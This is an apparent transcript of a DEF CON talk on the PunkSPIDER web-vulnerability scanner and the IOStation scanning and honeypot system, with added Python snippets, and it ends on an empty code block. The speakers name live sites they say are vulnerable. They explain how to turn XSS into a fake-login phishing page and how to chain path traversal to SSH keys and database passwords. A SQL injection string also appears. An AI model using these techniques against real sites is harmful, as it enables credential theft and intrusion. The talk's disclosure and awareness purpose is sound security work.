DEF CON 29 - hyp3ri0n aka Alejandro Caceres Jason Hopper - PunkSPIDER and IOStation: Making a Mess

Aug 5, 2021 17:39 · 9223 words · 44 minute read

- Hello, everyone. And welcome to PunkSPIDER and IOStation, making a mess all over the internet.

00:07 - I am Jason Hopper, and I’m the Director of Research at QOMPLX, and I’m here with- - I’m Alejandro Caceres.

00:15 - I’m the Director of Computer Network Exploitation at QOMPLX.

00:19 - - Years ago, Alex invented or developed a system called PunkSPIDER, and I developed something called IOStation.

00:26 - They’re both pretty cool tools, and we’ve been dusting them off lately and starting to find some really good ways that we can work together.

00:33 - And this talk is just kind of about how they started, you know, how they’re going and where they’re gonna be soon.

00:41 - - Yeah, so start off with a little history lesson on what the fuck is PunkSPIDER, right? So PunkSPIDER was a distributed mass web application fuzzing project run over a Hadoop cluster, with storage in a distributed backend.

00:56 - Don’t worry if you didn’t fully understand that; we’ll be going through what the fuck that means in a few later slides.

01:03 - It was based on some older technology. You might vaguely remember it as that site that showed, like, SQL injection or some other vulnerabilities in websites or some shit; that’s usually how people remember it.

01:17 - So if you remember something like that, that was PunkSPIDER.

01:21 - It was presented at ShmooCon in 2013, and it also made a guest appearance at DEF CON 2014 as well, so.

01:30 - Still a long time ago. During this old release, everything was MapReduce, right? If you remember that time when big data was the big buzzword, instead of fucking like blockchain or whatever, then you remember the times of big data, right? And the real game changer there was that we could now crunch data in a distributed manner that was not incredibly difficult, right? So MapReduce was not the most absolutely efficient way to do distributed computing, but it was absolutely one of the easiest and one of the most well-documented ones.

02:05 - Like you can follow simple tutorials and get a pretty decent cluster up and running.

02:09 - So it was actually really cool, and everything back then was MapReduce.
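
To make the MapReduce idea concrete, here is a minimal single-process sketch in Python. It is not the actual PunkSPIDER job, which the talk does not show; the record layout and the function names (`map_phase`, `shuffle`, `reduce_phase`, `run`) are assumptions for illustration. It counts findings per vulnerability type, roughly the kind of aggregate a scan cluster would compute.

```python
from collections import defaultdict
from itertools import chain

# Hypothetical scan records: (domain, vulnerability type). Illustrative only.
RECORDS = [
    ("a.example", "xss"),
    ("a.example", "sqli"),
    ("b.example", "xss"),
]


def map_phase(record):
    """Emit one (key, 1) pair per finding, keyed by vulnerability type."""
    _domain, vuln_type = record
    yield (vuln_type, 1)


def shuffle(pairs):
    """Group values by key, the step a framework performs between map and reduce."""
    groups = defaultdict(list)
    for key, value in pairs:
        groups[key].append(value)
    return groups


def reduce_phase(key, values):
    """Sum the counts collected for one key."""
    return key, sum(values)


def run(records):
    """Run map, shuffle, and reduce in a single process."""
    mapped = chain.from_iterable(map_phase(r) for r in records)
    return dict(reduce_phase(k, v) for k, v in shuffle(mapped).items())
```

On a real cluster the map and reduce calls would run on different machines; the appeal described above is that the programmer only writes those two functions.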

02:16 - So now I’m gonna show you my sick UI skills coming up.

02:20 - Nobody get intimidated, you know. This is the old PunkSPIDER, as you can see, there is a lot of, you know, just text, but main thing I wanted to show you is you would type in a URL.

02:34 - You could also make that kind of like wildcard URL, right? So like Darknet, Gitstar, for example.

02:41 - By the way, don’t actually go to the site. It used to be a stamp site, might’ve been taken down whatever two stamp ago.

02:47 - And for those of you that already have, you know, sorry, but what do you see, right? So you see that what’s returned, which is at the bottom bit there, is a last date scan.

02:59 - Of course, we wanna keep our records updated, and a number of web application vulnerabilities that we’re fuzzing and scanning for.

03:07 - So obviously this is Blind SQL injection, SQL injection, cross-site scripting, path traversal, blah, blah, blah, other very serious vulnerabilities in websites, right? So what we’d love people to do, in a very, it’s just an extremely open fashion.

03:23 - We had an open API, open UI, and everything, is you could search any websites that you wanted and get either aggregate statistics on the vulnerability state of, for example, if we were to do like *.edu, or just kind of do your own research, do your own vulnerability research.

03:44 - I believe by, you know, by the time this project sort of was shelved for a little bit, we had something like 3.4 million vulnerabilities or something like that.

03:54 - So it was pretty cool. So now we’re out with the old, right? That was old shit, old technology, great technology, good stuff that inspired a lot of the technology that’s around today, but it was still old, right? So now we’re back, we’re full on developing, and the biggest change to the project is that Hyperion Gray was bought by a company called QOMPLX.

04:22 - And QOMPLX has been really amazing about giving us the time, resources, money, backing, legitimacy, everything possible for us to succeed in this project.

04:37 - Meaning that really, this thing is flying right now.

04:41 - And I’ll get into some of the numbers and we’ll get into some of the specifics of what we’re checking for in PunkSPIDER right now.

04:48 - But this thing is really flying. It’s got dedicated engineering time.

04:51 - It’s not going back down, put it that way, and it’s only gonna get better and better.

04:56 - But anyway, that’s enough about PunkSPIDER, Hopper here is gonna give you some bit of backstory about IOStation.

05:03 - - Yeah, so IOStation used to be called Omnisense.

05:07 - I apologize if I accidentally say that in a sentence later, but Sysadmins have similarly never liked this program or the system either.

05:17 - It started pretty innocently, and sorry, what it is is just a giant collection of tools that generate and aggregate data and make that available to a user.

05:25 - And it really did start out quite innocently.

05:27 - I was just coming into the cybersecurity space and I started learning about just how crazy the DNS system is.

05:35 - Like what you can do with it, the way that it’s exploited and it’s such a seemingly simple system, but I couldn’t believe the, like the depth.

05:42 - And I was, you know, learning about DNS amplification attacks and decided, because the way that I learned things best is by recreating the wheel, that I would just write a DNS server from scratch, and I turned it into an amplification sinkhole and then started just getting real interested in that.

05:55 - So I was writing a blog post and I wanted to say, there are, you know, this many open recursive DNS servers on the internet.

06:02 - Recursive DNS server, of course, being one that will answer a query for any domain, it’ll go out and find the answer up the tree.

06:10 - And so I started, I couldn’t find that answer, how many there were on the internet? So I started writing a little Python script to do the scan, to find them.

06:16 - And then, you know, I realized that, although that sounds simple and conceptually it’s simple, there really are a lot of subtleties to actually being able to do even a simple scan at scale.
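
As a rough illustration of what such a check involves at the packet level, the sketch below builds a DNS query with the "recursion desired" bit set and inspects the header of a reply. It is not the IOStation scanner; the function names are made up for this example, and sending the packet over UDP port 53 is deliberately left out. The header layout and flag bits follow the standard DNS message format.

```python
import struct


def build_query(name: str, query_id: int = 0x1234) -> bytes:
    """Build a minimal DNS query for an A record with the RD bit set."""
    # Header: ID, flags (0x0100 = recursion desired), QDCOUNT=1, other counts 0.
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    # QNAME: each label prefixed by its length, terminated by a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    # QTYPE=1 (A), QCLASS=1 (IN).
    return header + qname + struct.pack("!HH", 1, 1)


def looks_open_recursive(response: bytes) -> bool:
    """First-pass signal: a reply that advertises recursion and carries answers."""
    if len(response) < 12:
        return False
    _id, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", response[:12])
    is_response = bool(flags & 0x8000)          # QR bit
    recursion_available = bool(flags & 0x0080)  # RA bit
    no_error = (flags & 0x000F) == 0            # RCODE == NOERROR
    return is_response and recursion_available and no_error and ancount > 0
```

A real scan would also need timeouts, rate limiting, and a query name the target is not authoritative for, which is where the subtleties at scale come in.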

06:26 - And, you know, and then, and then, and then, it’s some giant deep rabbit hole.

06:30 - And before I knew it, you know, I had this big system.

06:35 - It’s made up of many different parts, but the primary parts are port scanning.

06:39 - It’s scanning over 25 ports. There’s a lot of like custom extractions that it’s doing.

06:45 - In addition to the obvious stuff like banner grabbing and service detection and things like that.

06:51 - On the Darkweb, we’re again doing port scanning, we’re trying to tease out any information on additional onion sites that might be hosted on the same VM or definitely any way that we can link it to a surface IP address or domain or something like that to do any attribution for sites that, you know, should be taken down by law enforcement.

07:09 - We’re also, of course, crawling all these websites as well.

07:11 - So we’re doing, you know, Darkweb mentions for, you know, corporate entities and names of other things of interest.

07:18 - And, you know, coming from the pure cybersecurity space when we joined QOMPLX.

07:22 - QOMPLX is a cybersecurity company, but they really focus on assessing risk and transforming risk.

07:29 - And so there’s a bit of a mind shift that had to happen on my part where some things that are really good for pure cybersecurity actually don’t inform risk that well, and there are a lot of other tools that you can use in its place.

07:40 - So I’ve sort of been working on the system, but with that very much in mind.

07:44 - So a lot of the new kind of directions that I’m, or the new tooling or the new things that I’m interested in really are kind of going down that namespace, and that can be simple things or seemingly simple things like even just identifying what a corporation has.

07:56 - Like what are their assets? Where are they? Some corporations, honestly, can’t even answer that question for you.

08:02 - And so doing this in a kind of broad autonomous fashion is really interesting.

08:06 - How that informs other sort of risk metrics and then looking at kind of proxy measures, like what jobs are they hiring? What technologies do they have in those job ads? Like how does that potentially inform, you know, what they’re doing in-house? We also have some passive sensors, so I’ll call them, you know, we’re monitoring the global certificate transparency logs.

08:23 - So pretty well, any SSL certificate that’s generated, we record a copy of in near real-time.

08:29 - And then we also have another significant component, which is our listening network.

08:33 - So they’re basically these low interaction honeypots that are distributed globally and all across the IPv4 spectrum.

08:40 - And they’re out there sort of just, you know, listening.

08:44 - They then can identify the early onset of any sort of broad malicious activity or benign activity for that matter.

08:51 - And we can use that as a way to profile the threat in like a SOC log, for example, you know, SOCs have a lot to deal with.

08:58 - They don’t need to be chasing down leads that end up just being like Google crawlers or the university of, you know, whatever doing research.
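
A minimal sketch of that triage step, assuming the listening network has already produced a list of networks known to belong to benign scanners. The allowlist, the alert format, and the function names are hypothetical; the addresses are reserved documentation ranges, not real scanners.

```python
import ipaddress

# Hypothetical allowlist of benign scanner networks (documentation ranges only).
BENIGN_NETWORKS = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]


def is_benign(source_ip: str) -> bool:
    """True if the source address falls inside any known-benign network."""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net for net in BENIGN_NETWORKS)


def triage(alerts):
    """Keep only alerts whose source is not a known-benign scanner."""
    return [alert for alert in alerts if not is_benign(alert["src"])]
```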

09:05 - Similarly, we can use this to inform a risk score for any given corporation.

09:10 - If we know what their assets are, have any of them been involved in say, being part of a botnet? And if so, for how long? Like, you know, getting popped, you know, once last year is one thing.

09:19 - Getting popped and then remaining part of a botnet or whatever for six months is kind of something else, that sort of speaks to their detection and remediation policies.
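
The "for how long" question can be sketched as a simple span calculation over sighting dates. This is an assumption about how such a metric might be computed, not the scoring the speakers use; the input format and the name `dwell_by_asset` are hypothetical, and a span between first and last sighting does not prove continuous compromise.

```python
from datetime import date


def dwell_by_asset(sightings):
    """Map each asset to the number of days between its first and last
    malicious sighting, inclusive. Assets with no sightings are skipped."""
    return {
        asset: (max(days) - min(days)).days + 1
        for asset, days in sightings.items()
        if days
    }
```

An asset seen once scores 1 day, while one seen on both 1 January and 30 June 2021 scores 181 days, which is the distinction drawn above between a one-off incident and a six-month stay in a botnet.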

09:29 - Of course, I still have the amplification attack sinkhole.

09:32 - It’s not the most particularly valuable sensor, but you know, it’s an oldie and a goodie.

09:37 - And then you know, honestly, I started learning that if you just start registering with places and then looking under some rocks, there’s some really good data that you can get for free.

09:44 - I mean, ARIN and WHOIS, sorry, ARIN and IANA, you know, can provide lots of data.

09:50 - So I collect WHOIS data on IP addresses, which gives you ASN information, organization details, and point of contacts.

09:59 - I do get domain WHOIS, but that’s such a low value signal.

10:01 - It’s almost not worth mentioning. One of the ways that Alex and I are collaborating right now actually is on doing some malware analysis that we capture in our network.

10:08 - So that would be, you know, just doing fingerprints, looking for what sort of network behavior might be going on, and trying to integrate that with some of the other tools to get a more broad picture of what’s really going on in the internet.

10:19 - And then I also record all information from the DNS root zone files for, you know, like a thousand top level domains, basically, anything that’s not a country code.

10:28 - And that can be really interesting just to identify suspicious domains as they pop up.

10:32 - They might be used as like a C2 server or phishing or something like that.

10:36 - But then it also can be used in actually identifying assets of a company.

10:41 - The other thing I forgot to mention is, you know, in terms of proxy metrics for the corporations, you can also do things like look at their SEC filings and try to evaluate, you know, for a company of this size in this industry, is their funding in cybersecurity sufficient? And lastly, you know, no cybersecurity tool is complete if you’re not pulling in some GeoIP data.

11:00 - (laughs) So this has been a big undertaking for a lot of years.

11:04 - And so I started off small, but I needed to rent some servers and things.

11:09 - And I figured I was more interested in spending money on something that I can hold in my hand and have forever for a long time.

11:15 - So instead of buying a lot of cloud services, I actually convinced my wife to allow me to build a small datacenter in the basement when we were redoing the basement anyway.

11:24 - And so the middle picture here is sort of the first version of that, where I’ve got a whole bunch of old desktops and I bought a few used Dell R710s, which bang for your buck are awesome little machines.

11:37 - They’re real little workhorses. And I had to become an internet service provider, which meant, you know, registering with the government and applying for a license.

11:43 - I’ve got a BITS license, which is basic internet telecom services license, which means I can actually sell internet to my neighbors, which is funny.

11:50 - Although, you know, there’s not really much good reason to do so.

11:53 - It’s not exactly cost-effective, but I have used some cloud services.

11:57 - So I’ve done a lot of scanning for years using Linode.

12:00 - And Linode has always been really, really supportive.

12:03 - They, you know, have asked me to abide by a number of very reasonable guidelines and otherwise they provide me a lot of cover for the very large number of abuse complaints that I bring their way, which is really awesome.

12:17 - So, you know, if by chance anyone from Linode is out there, the trust and safety team in particular, who I feel like I’m on a first name basis with, thank you very much.

12:26 - (laughs) - And you know, one thing I’d like to say about this is that I had the lovely opportunity of seeing this project from kind of beginning to end.

12:40 - Not like there, I don’t live with Jason and his wife.

12:43 - (laughs) But I got to, you know, hear about like, “Hey, I’m thinking of building a datacenter,” all the way, you know, to that middle picture, which by the way, just to point out, Jason is a woodworker, metalworker, astronomer, blah, blah, blah.

12:58 - He does fucking everything and he’s good at it too.

13:02 - So he built his own little server rack right there.

13:05 - And you saw that once he surpassed that he bought a big fucking server rack.

13:09 - So that’s just fucking Jason. He’s crazy. - It’s true.

13:12 - - I just want to point out how insane it is that, you know, he literally built an internet service provider in his basement and he’s like, “Yeah, no big deal.” - Just a Saturday.

13:21 - - So anything, that’s all. - No, it’s true.

13:24 - I was quite proud of that little server rack.

13:25 - You know, I use pocket holes and everything, you know, it was fun.

13:28 - But you know, Alex, we’ve been talking a big game here, man.

13:31 - What do you say we put our websites where our mouth is? I don’t know, that’s a terrible joke.

13:37 - (laughs) - Sure, no, I like it. Let’s put our websites where our mouth is.

13:42 - - All right, so- (laughs) So you know, a little preface on this one.

13:46 - So we do have a user interface that has been revamped since the one that Alex has shown.

13:52 - However, it is not released yet, and we are releasing a UI in the fall of this year.

13:59 - This is just our sort of internal alpha use version only.

14:03 - Functionally, I’m sure it bears some semblance to what we will end up releasing, but the one in the fall is going to be much, much nicer than this even.

14:12 - So, you know, this is PunkSPIDER. No good search engine is complete without a giant search bar.

14:19 - So up at the top here, I’m just gonna pick like a random domain, something that I don’t know, may or may not be a little bit popular and do a little search.

14:27 - And you can see that this kind of tumblr.com website had no vulnerabilities, but you know, there actually is this one called kickstarter.com, which just so happens to have, I see here, a cross-site scripting vulnerability.

14:40 - So we display that, we show the parameter that we’re using to abuse this.

14:44 - And then we’ve got these handy-dandy buttons, which you can click to test the vulnerability, which will actually open up this webpage with payload and show you that it actually is, it is working.

14:54 - And then you can also copy a cURL command, which is kind of handy.

14:57 - If you want to, you know, change the text or do whatever.

15:00 - We also have this like fairly complex way of scoring these websites.

15:05 - So our thinking is that any one of the vulnerabilities that we’re testing for is just insane to have on a website in modern times.

15:12 - You know, there’s no excuse for it, which means that if you have even one cross-site scripting vulnerability, your security posture basically is a giant dumpster fire.

15:21 - So we, I think very appropriately rank these websites on the scale of one to five dumpster fires.

15:28 - And that’s what this, you can kind of see it is here.

15:31 - So another kind of cool thing is a way that we’ve already started to kind of work together between the two projects is port scan data.

15:37 - So this is kind of an easy lift all things considered, but you can click on ports and see that, you know, this one, for example, is running, it looks like a mail server and an OpenSSH server.

15:47 - And so we’re starting to kind of bring these datasets together and start answering some communal questions.

15:51 - But at the end of the day, what we want this to be is just a giant database that users can search.

15:57 - You can look at your own domains. You can check the domains that you visit or frequent.

16:00 - We want this to be a really awesome security tool for the masses.

16:04 - And there are a few limits that we’ve had to walk a fine line on.

16:08 - Of course, we don’t want people coming here to just rip off the database and go do whatever, but we’ll kind of circle back to that, but yeah, did you have anything to add, Alex? - No, no, that was an excellent overview of our user interface.

16:21 - You’ll see the little country codes, of course, which as Jason mentioned, are essential to any security tool.

16:28 - - Absolutely. (laughs) So, you know, Alex, it’s funny, before this talk, I was actually on this website called archive.org, which I know is really, really popular.

16:37 - And this new browser extension I’ve got, has this like this eight on it, and it’s trying to tell me something.

16:42 - Do you know anything about that? - I don’t.

16:45 - (laughs) - You don’t. - Oh, I’m just kidding. (laughs) - I clearly knew them, but.

16:50 - Yeah, so what we really wanted to do here is PunkSPIDER has a few goals, and we’re gonna talk about them a little bit later.

16:59 - But one really big goal that we have is that we wanna engage not only with the security community.

17:05 - I know we’re speaking at DEFCON, and you’re probably with the security community.

17:08 - But I think it’s really important that we release our stuff out there so that it’s ingestible by normal humans, right? So if you look at the browser plugin, it’s really simple.

17:22 - You may have already guessed this. There are several vulnerabilities on archive.org.

17:29 - It has one dumpster fire rating, which I believe is appropriate for the number of vulnerabilities found and types of vulnerabilities found.

17:36 - And probably the most important part of this plugin, frankly, is just that big red spider, right? So that red button just tells you, “Hey, this one site is dangerous.” So anybody that knows something about web security, doesn’t know anything about web security, et cetera, whatever.

17:54 - Anybody can really use this. One other really cool feature of this plugin is the trip report.

18:01 - So at the very bottom right of the plugin, you can see it says trip report, and if you click on that.

18:07 - We’ve only gone to some sites with cross-site scripting right now.

18:10 - So, you know, the results are kind of obvious in terms of what they do, but all we’re doing is we’re taking basic types of extremely serious web application vulnerabilities and giving you a rolled-up kind of view: in my last browsing session,

18:31 - how many websites did I visit that were vulnerable, right? So that’s something that you might wanna know.

18:36 - You might wanna say like, “Oh, shit! Okay, you know, I’ve been browsing for a week and I have like 1% vulnerable.

18:44 - I wanna go back and see who that was and determine if I want to give them more information, right?” Like extremely important for you to know that.
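
The roll-up behind a trip report can be sketched in a few lines. This is an illustration of the arithmetic only, not the extension's code; the function name `trip_report` and its inputs (a browsing history and a set of domains flagged as vulnerable) are assumptions.

```python
def trip_report(visited, vulnerable):
    """Summarize a browsing session: unique sites visited, which of them are
    flagged as vulnerable, and the percentage that represents."""
    unique = set(visited)
    flagged = sorted(unique & set(vulnerable))
    percent = 100.0 * len(flagged) / len(unique) if unique else 0.0
    return {"visited": len(unique), "vulnerable": flagged, "percent": percent}
```

Repeat visits are counted once, so the percentage answers "what share of the sites I used are vulnerable" and the `vulnerable` list answers "who was that".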

18:52 - So that’s what we wanted to do with this browser extension.

18:55 - It’s also got this little like reset button that you can press, that resets your stats.

18:59 - And one particularly important thing, Jason, if you could just go to like any random website, I don’t know, like Google, ‘cause it’s pretty good, and open up the extension for me.

19:11 - - Yep. - You can see that it’s grayed out, right? That means that PunkSPIDER doesn’t currently have any data on it, or is it, I’m sorry, Jason.

19:24 - (faintly speaking) - Yeah, I went to Google, so it’s been scanned.

19:27 - Yeah, I know it’s green. It’s been scanned.

19:29 - - Oh, fuck me, it’s green, okay. So Google has been scanned.

19:32 - So it’s gonna tell you if you’re clean as well.

19:35 - Another state of this particular plugin is gray, which means that we haven’t scanned it.

19:42 - If it is gray, then you have the option to submit it for scan.

19:46 - The scan is really, really, really fast. Like I’ve never seen it take more than like three or four minutes.

19:51 - So that’s currently the plugin. I wanted to show that with a major website like archive.org, because most of you have probably heard of it and it’s a very often used website, but we can move on to the next.

20:04 - - Yeah. So just to illustrate the vulnerability here, I’ll hit reset, and you can see it executing the payload, printing out the message that we’ve programmed.

20:13 - - Yeah. Which is totally elite. - Yep, total elite.

20:17 - - All right, cool. Let’s move on to the next one.

20:20 - - LendingTree. All right, go for it.

20:21 - - All right, so these fucking LendingTree people.

20:23 - Okay, so LendingTree, right? What can I say about them? Okay, I contacted them on Twitter about what I described to them as a horrible vulnerability that is very obvious in your website, and I did not receive an answer.

20:45 - I could give you a whole rant on my views on the fucking responsible disclosure, but I’m gonna save it.

20:53 - And just say that as you can obviously see from Jason loading the page is that, you know, this payload is executed seven times.

21:03 - There’s absolutely no filtering going on here, and you can also see that it’s just in a basic bitch, basic-ass query parameter there, right? And that payload is not very complicated.

21:16 - That’s like the cross-site scripting payload basically, with like one thing added.
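
A minimal sketch of how a scanner might decide that a parameter value comes back unfiltered, assuming it has already fetched the response body. The marker string and the function name are hypothetical, and this is not PunkSPIDER's detection logic; it only distinguishes a raw reflection from an HTML-escaped one.

```python
import html

# Hypothetical, harmless probe. A real test payload would differ.
MARKER = '<i id="probe-7f3a">'


def classify_reflection(body: str, marker: str = MARKER):
    """Return (state, count): 'unescaped' if the marker appears verbatim,
    'escaped' if only its HTML-escaped form appears, otherwise 'absent'."""
    raw = body.count(marker)
    if raw:
        return ("unescaped", raw)
    escaped = body.count(html.escape(marker))
    if escaped:
        return ("escaped", escaped)
    return ("absent", 0)
```

A page that echoes the value verbatim in several places, as in the demo above, would come back as `unescaped` with a count greater than one.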

21:21 - So there’s really no excuse. We contacted LendingTree.

21:27 - Let’s see, a journalist contacted LendingTree, I contacted, no, I did yeah.

21:32 - So two people contacted LendingTree, this was over a month ago and we still have received absolutely no response.

21:39 - That to me, it’s just egregious. We are not checking for really super complex second order blind SQL injections to get a fucking out of band shell.

21:51 - We’re giving really basic bitch parameter injection here and just getting it right back.

21:57 - So any simple website scanner, whether it be open source, paid, whatever, should really be able to catch this.

22:04 - Hell, you should be able to catch this shit manually if you’re building this website.

22:08 - So it’s really a kind of inexcusable one, and because it’s a popular website, I felt like I’d go ahead and call them out.

22:16 - Also, well, yeah, I won’t pick on them anymore, but- - Yeah.

22:20 - - That’s all I have to say about LendingTree.

22:22 - - It’s funny too. You know, people complain about, you know, you get a pen test team, that’s not all that good.

22:28 - And all they do is run automated tools but they’re cheaper or whatever.

22:31 - Like when we’re talking about cross-site scripting and a lot of these vulnerabilities, like those would still expose these problems.

22:36 - So these companies are not even doing that.

22:38 - - Yeah, yeah. And I mean, if you include, even including like time of like an engineer, like that’s like 10 minutes, you know.

22:48 - Like it’s not a significant cost either, like so anyway.

22:53 - Moving on. My pleasure. - All right, we’re gonna move through the next ones.

22:55 - I think a little bit faster here, but that’s okay.

22:58 - This is a good one. - All right. Not a problem, bud.

23:00 - This is tapas.io. It is a manga website, not about delicious, delicious tacos, but that’s okay, right? So as you might’ve guessed here, if you click on the plugin or were to check PunkSPIDER, whatever, you can see that it’s red, it has a vulnerability, and it’s a cross-site scripting vulnerability.

23:19 - I know that you didn’t see an alert box pop up, but let’s go through this website real quick and we’ll see what it has to say, right? So pretty basic login page, username, password, login, remember me, et cetera.

23:34 - Okay. That’s fine, right? So Jason, if you could just scroll all the way down to page four, please. - Sure.

23:41 - Oh, holy cow. There’s like this whole other login form almost completely by the footer.

23:47 - What’s that? - Yeah. So this is the real login form for the web page.

23:52 - Thanks for the lead in, bud. But this is the real login page for the website, right? So all I’ve done is, because most cross-site scripting also has an HTML injection vulnerability in it.

24:05 - We just push it down with a bunch of BR tags, right? So like line break tags.

24:12 - I pushed the real login all the way down and created a fake login up at the top.

24:16 - So what does that allow me to do? That means that I can grab that link that’s in the little bar right there, send it to everybody that I know uses tapas.io.

24:26 - Whether that be from a Twitter search or LinkedIn search, whatever search, and it’s something that they inherently trust, right? So now I can just sit back there and collect usernames and passwords.

24:38 - I know there’s still like some cross-origin restrictions that we need to kind of get around.

24:43 - This isn’t a web app hacking talk, so I won’t go through those.

24:46 - But this is very easy to just start stealing usernames and passwords is my point.

24:52 - And that sucks. So to anybody that says that reflected cross-site scripting is not that serious.

24:59 - You’re wrong. - This is why they’re wrong.

25:01 - (laughs) Yeah. So, you know, our tests aren’t looking just for cross-site scripting, although there are many of those.

25:10 - We’re also doing SQL injection, as Alex has said before.

25:14 - So this is an example of this. So primeinvestor.in, you know, presumably something to do with finances.

25:20 - They’ve got a login page. They might have pretty sensitive information behind this, and they’re not sanitizing their inputs.

25:27 - So we were able to have the web server execute a SQL query just by putting it into like a text form or something like that.

25:34 - It’s also kind of interesting that it can also, even the error can give you back more information.

25:37 - Like this is clearly a WordPress site, but this is crazy.

25:41 - I mean, you know, all they’re doing is not sanitizing their input.

25:45 - I mean, most frameworks nowadays won’t let you avoid it.
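
The difference between pasting input into a query and binding it as a parameter can be shown with Python's built-in `sqlite3` module. The table, data, and function names below are invented for the example and say nothing about how the site in the demo is built.

```python
import sqlite3


def make_db():
    """Create a throwaway in-memory database with two illustrative users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)", [("alice", "a1"), ("bob", "b2")]
    )
    return conn


def lookup_unsafe(conn, name):
    """Vulnerable: user input becomes part of the SQL text itself."""
    query = f"SELECT secret FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, name):
    """Parameterized: the driver passes the input as data, never as SQL."""
    query = "SELECT secret FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]
```

With the input `x' OR '1'='1`, the unsafe version returns every row in the table, while the parameterized version simply looks for a user with that odd name and finds nothing.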

25:48 - I mean, this has gotta be like, you almost have to go out of your way to have this still be a problem.

25:52 - And it’s a huge problem because this is being executed with the same permissions as the web server itself.

25:57 - And so the web server must have read-write permissions on all the tables related to users and things like that.

26:03 - A website that has this kind of problem, it wouldn’t surprise me in the slightest if they had plain text passwords being stored in the database.

26:09 - So potentially, they could just dump this whole thing.

26:11 - At the very least, they’re probably not salting them or whatever, and you could just, you know, unhash them or something.
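
For contrast, a minimal sketch of salted password hashing using only the Python standard library. The iteration count and function names are illustrative choices, not a recommendation from the talk; the point is that a random per-user salt makes identical passwords hash differently, so precomputed lookups stop working.

```python
import hashlib
import hmac
import os


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000):
    """Derive a key with PBKDF2-HMAC-SHA256, generating a random salt if none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes,
                    iterations: int = 200_000) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    _salt, digest = hash_password(password, salt, iterations)
    return hmac.compare_digest(digest, expected)
```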

26:15 - But this is a massive problem, really. I mean, this is, yeah.

26:20 - I think you have, do you have more to say on that, Alex? - I do.

26:25 - You know, we think of sites like this, like primeinvestor.in, as not a huge deal, right? I mean, whatever.

26:34 - You found some SQL injection. Good job, right? The problem with that is that we can no longer rely on that argument, right? So we are in the age of data breaches.

26:45 - We’re to a point where data breaches are so prevalent that, you know, you have tens of trillions of records sometimes in leak aggregators.

26:56 - Meaning that every breach, whether it affects you directly or not, whether it’s a website that you actually care about, whether the username and password that you use on that website was sensitive or not, like it can still affect you, right? So websites that have nothing to do with you are now seriously affecting the security of corporations and people in general, right? So like I said, we’re in the age of the data breach and stuff like this is really inexcusable.

27:30 - To give you an idea, all of the websites that we’re showing are in the Alexa top 5,000.

27:34 - Like you may not have heard of some of these websites, but they are the top websites on the internet.

27:40 - So to have something like this is, it’s really just irresponsible, quite frankly.

27:46 - It’s completely irresponsible, and it’s causing major problems across the internet these days.

27:53 - Like even the fucking Colonial Pipeline hack was a credential stuffing attack against their VPN, right? So I mean, that can be completely unrelated websites got breached, and then a VPN got breached.

28:07 - Like we can’t have websites like this out there that are just giving usernames and passwords.

28:14 - And we also know now from all these aggregators, that are being built and all the password research that’s going on, that one, people are fucking terrible at passwords.

28:25 - Like, you know, we get the secret five one, and that’s all of a sudden the fucking secure password.

28:31 - But the other thing is that people reuse their passwords everywhere.

28:36 - So even if it’s a site that you don’t necessarily care about, if you reuse that password in one single place, somebody could easily find it, and that’s all I have to say about that.

28:46 - - Yeah. I think the next example is actually pretty cool one.

28:50 - So this is a traversal attack, which means that we can put in the URL, the path to a different file or something that the web server should definitely not be allowed to access, or certainly shouldn’t be showing to a random website viewer.

29:03 - But we’re doing this with the passwords file in Linux, and what that does is it gives us a list of all the different users and groups, including all the system users that this server has.

29:13 - And this is a massive problem because basically this means that we can view files on the server easily.

29:18 - So we could go through this list, find a username that we think is a person or like an actual user.

29:23 - And then try to, for example, view their private key, their SSH private key.

29:28 - If we had that, then we could also take a few guesses that maybe some, if it’s on a VM or it’s just, you know, hosting this website even, you know, maybe it’s using some common frameworks like WordPress or something.

29:39 - So WordPress has some default install folder.

29:42 - So maybe we can then go and try to look at the config file and get the database password.

29:46 - So now we could potentially login to the server and access the database freely, or the database of another server being hosted on the same VM.

29:54 - I mean, this server’s vulnerable, which means really, it’s putting all of its neighbors at risk.

29:59 - And it’s just, again, it’s just so silly, like, you know, fix the permissions.
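A minimal sketch of the server-side check that stops the traversal described above, assuming a Python backend. The function name `resolve_inside` and the `/srv/www` web root are hypothetical, not taken from the site shown in the talk. The idea is to resolve the requested path and refuse anything that lands outside the web root.

```python
from pathlib import Path
from typing import Optional


def resolve_inside(web_root: str, requested: str) -> Optional[Path]:
    """Return the resolved file path, or None if it escapes web_root."""
    root = Path(web_root).resolve()
    # Treat the request as relative to the web root, then collapse any "..".
    candidate = (root / requested.lstrip("/")).resolve()
    # Accept only the root itself or something strictly below it.
    if candidate != root and root not in candidate.parents:
        return None
    return candidate


if __name__ == "__main__":
    print(resolve_inside("/srv/www", "css/site.css"))       # stays inside the root
    print(resolve_inside("/srv/www", "../../etc/passwd"))   # rejected: None
```

File permissions are still worth fixing, as the speakers say; this check only covers the path handling in the application itself.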

30:04 - - Yeah. - Yeah. Lastly, this one is just sort of a bit of, you know, beating a dead horse here.

30:10 - But Kickstarter has a cross-site scripting vulnerability.

30:13 - So I just hit refresh here, you know, PunkSPIDER’s back.

30:16 - (laughs) Nothing shows this off better.

30:18 - But Kickstarter is a bigger organization. They can afford, you know, like one intern to just go through and check for obvious scripting vulnerabilities and stuff like that.

30:27 - I mean, there’s really no reason for this. You give this company money, you have login credentials, you have user data.

30:34 - I mean, I don’t even know what else they probably have on the backend, but you know, you’re putting people at risk with this.
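For reference, the usual fix for a reflected cross-site scripting bug is to escape user input before it is written into the page. A minimal sketch using Python's standard library follows; `render_search_banner` is a hypothetical function, not code from any site named in the talk.

```python
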